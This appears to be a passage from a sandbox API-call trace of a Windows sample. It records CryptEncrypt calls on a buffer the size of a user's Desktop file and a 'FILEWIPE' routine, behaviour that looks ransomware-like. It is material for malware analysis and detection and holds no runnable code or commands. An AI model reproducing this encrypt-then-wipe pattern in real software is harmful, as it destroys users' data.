hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.080] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0075.081] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x76b090, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.082] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0075.082] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.082] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x329b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x32a0) returned 1 [0075.082] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.082] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.082] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.082] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.082] CharLowerBuffW (in: lpsz="byte[12961]", cchLength=0xb | out: lpsz="byte[12961]") returned 0xb [0075.082] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.083] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.083] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x795ff8*, pdwDataLen=0x61e2d8*=0x329b, dwBufLen=0x32a0 | out: pbData=0x795ff8*, pdwDataLen=0x61e2d8*=0x32a0) returned 1 [0075.083] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.083] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.083] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.083] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.083] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.084] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.084] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.084] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.084] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.084] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.084] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.084] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.086] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.086] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.086] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.086] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.086] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0075.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.086] CryptDestroyKey (hKey=0x6b8af8) returned 1 [0075.086] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.087] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.087] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.087] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.087] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.087] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.087] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.087] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.087] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.087] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.087] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.087] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.087] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.087] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.087] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.087] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.087] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.088] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.088] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.088] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0075.088] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.088] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.088] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.088] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.088] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.088] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.088] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.088] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.089] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.089] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.089] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.089] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.090] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.090] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa554300, ftCreationTime.dwHighDateTime=0x1d5e54b, ftLastAccessTime.dwLowDateTime=0xd5e4b850, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xd5e4b850, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x329b, dwReserved0=0x0, dwReserved1=0x657690, cFileName="BhG Xz5NyPYF_.flv", cAlternateFileName="BHGXZ5~1.FLV")) returned 0x6b89f8 [0075.090] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.090] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.090] CharLowerBuffW (in: lpsz="byte[12955]", cchLength=0xb | out: lpsz="byte[12955]") returned 0xb [0075.090] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.090] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.090] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.090] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.090] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb438 [0075.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb438, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0075.091] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.091] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a3dc8 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.091] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.091] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.091] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.091] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.092] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.092] 